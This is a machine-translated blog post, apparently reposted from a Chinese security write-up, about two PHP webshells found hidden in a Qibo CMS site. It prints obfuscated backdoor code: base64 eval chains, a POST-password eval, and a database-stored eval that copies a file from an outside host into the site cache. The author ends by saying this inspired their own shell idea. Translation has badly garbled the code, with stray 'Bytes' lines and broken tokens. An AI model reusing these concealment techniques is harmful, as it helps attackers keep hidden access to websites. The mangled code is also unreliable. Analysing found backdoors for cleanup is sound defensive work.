New hidden Trojan ideas discovered by shell

Last Update:2013-11-20 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Check webshell notes for friends
Today, a friend told me that his website was abnormal and asked me to check out the whole site of qibo. I checked webshell and found 2. One of them is a wonderful thing to hide, at least in a way I have never seen before. Unfortunately, eval () is used, a high-risk keyword ~
1. Mix the file into the normal file and remove the normal file with base64:

<? Php/* Powered by www.qibosoft.com */
$ Lll11l11l11l11l1 =__ FILE __; eval (base64_decode ('encode
QoJGx
Bytes
QiLGJh
C2U2NF9kZWNvZGUoZnJlYWQoJGxsMTFsbGwxMWxsbGwxMWwsMjcyKSkpOw = '); $ lll11111
1ll1l1ll
= $ Ll1llll111111l [0]; $ l1ll11lllll1ll1l = $ lll111111ll1l1ll {2 }. $ lll1111ll1l1ll {5 }. $ lll1111ll1l1ll {8 }. $ lll1111ll1l1ll {11 }. $ lll1111ll1l1ll {14 }. $ lll1111ll1l1ll {17 }. $ lll1111ll1l1ll {20 }. $ lll11
1111ll1l1ll {23 }. $ lll1111ll1l1ll {26 }. $ lll1111ll1l1ll {29 }. $ lll1111ll1l1ll {32 }. $ lll1111ll1l1ll {35 }. $ lll1111ll1l1ll {38}; $ scheme = $ l1ll11lllll1ll1l ($ ll1llll11111111l [1]); $ scheme = $ l1ll11lll1ll1l ($ l11ll111l1l
11l {2}. $ scheme {5}. $ l11llll111l1l11l {8}. $ l11llll111l1l11l {11}. $ l11ll111l1l11l {14}. $ l11
Llll111l1l11l
{17 }. $ l11llll111l1l11l {20 }. $ scheme {23}); $ scheme = $ l1ll11lll1ll1l ($ ll1ll11111111l [2]); $ l111ll111lll1111 = $ l1ll11lll1ll1l ($ scheme {2 }. $ lll1ll11l11l1ll1 {5 }. $ lll1ll11l11l1ll1 {8 }.
$ Lll1ll11
L11l1ll1 {11 }. $ lll1ll11l11l1ll1 {14 }. $ lll1ll11l11l1ll1 {17 }. $ lll1ll11l11l1ll1 {20 }. $ scheme {23}); $ ll1lll1lll111111 = $ l1ll11lllll1ll1l ($ ll1llll11111111l [3]); $ ll11llll1lllll = $ Scheme ($ ll1ll
L1lll111111 {2 }. $ ll1lll1lll111111 {5 }. $ ll1lll1lll111111 {8 }. $ ll1lll1lll111111 {11 }. $ ll1lll1lll111111 {14 }. $ ll1lll1lll111111 {17 }. $ ll1lll1lll111111 {20 }. $ ll1lll1lll111111 {23}); $ lll1ll11l1111l11 = $ l1l
L11lllll1ll1l ($ ll1llll111111l [4]); $ ll1111l11l11llll = $ l1ll11lllll1ll1l ($ lll1ll11l1111l11 {2}. $ lll1ll1
1l11l11 {5}. $ lll1ll11l1111l11 {8}. $ lll1ll11l1111l11 {11}. $ lll1ll11l1111l11 {14}. $ lll1ll11l111
1l11 {17}. $ lll1ll11l11l11 {20}. $ lll1ll11l11
11l11 {23}); $ llll11l1ll111l1l = $ l1ll11lllll1ll1l ($ ll1llll11111111l [5]); $ llll1l11llllllll = $ l1ll11lll1l
L1l ($ llll11l1ll
111l1l {2}. $ llll11l1ll111l1l {5}. $ llll11l1ll111l1l {8}. $ llll11l1ll111l1l {11}. $ llll11l1ll111l1l {14}. $
Llll11l1ll111
L1l {17}. $ llll11l1ll111l1l {20}. $ llll11l1ll111l1l {23}); eval ($ l1ll11lll1ll1l
('Jgxsmtfsbgxsbgwxbgxsbgwojgxsmtfsbgwxmwxsbgwxmwwsmtcpo2v2ywwo
JGwxbGwxMW
XsbGxsMWxsMWwoJGxsMTFsbGxsbGwxbGxsbGwoJGxsMTFsbGwxMWxsbGwx
MWwsMjMyKSkpO
W = '); return;?> Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Latency =
Bytes
Bytes
Bytes
TVd3c01qTXlLU2twT3c9PScpKTs = tGLOYY5fUpO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHe
Bytes
Bytes
Ykd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs = JqjcRhp75i6Lf4MwjO2V2YWwoJGwxbGwxM
Bytes
Bytes
3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs = yS0ttoM7R7SDkJ
Bytes
Bytes
Bytes
U2twT3c9PScpKTs = vMCvyQqBIgcoO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzY
Bytes
Bytes
HNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs = agQLu9pzZf25xZjXjO2V2YWwoJGwxbGwxMWxsbGxs
Bytes
Bytes
D3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs = WOmDsuNvUYJUFK3O
Bytes
Bytes
Bytes
PScpKTs = Success
Bytes
Bytes
1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs = lErzbn3Vk5O2V2YWwoJGwxbGwxMWxsbGxsMWx
Bytes
Bytes
3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qazJLU2twT3c9PScpKTs = U5zJkvgx0MBjZXZhbCg
Bytes
Bytes
Bytes
EHNNV3d4TVd4c2JHeHNiQ2drYkd3eE1XeHNiREV4Ykd4c2JERXhiQ2s3JykpOw = Orb94oK1BBa
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
UZGV4LnBocCc + IjsNCglleGl0Ow0KfQ = Oz1aqN6Bs2Twgiat5H0qQeo5bgm84V1tvONOA

The key points are as follows:

@ Eval (qqmd5 ("encrypt"
, 'De', $ _ POST ['mypwd']);

$ _ POST ['mypwd']

2. One sentence.
The eval keyword appears in a global file. The Code is as follows:

Eval (base64_decode ("Y $ webdb [_ Notice]");

This code is still quite novel. The $ webdb [_ Notice] variable corresponds to the key => value in the config table in the database.
The following content is queried in the database:

29weSgiaHR0cDovL3d3dy5waHAxNjguY29tL05vdGljZS8/dxjspsr3zwjkylt3dfdxjsxsisueh
QMTY4X1BBVEguImNhY2hlL05vdGljZS5waHAiKTs =

After adding the preceding Y and base64 decode, the result is:

Copy ("http://www.php168.com/Notice? Url = $ webdb [www_url] ", PHP168_PATH." cache/Notice. php ");

What is the situation? Is it so cool to officially publish notice? No, delete it first. However, it gave me a shell idea,
Hahahahahahahahaha! -_-!

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

New hidden Trojan ideas discovered by shell

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support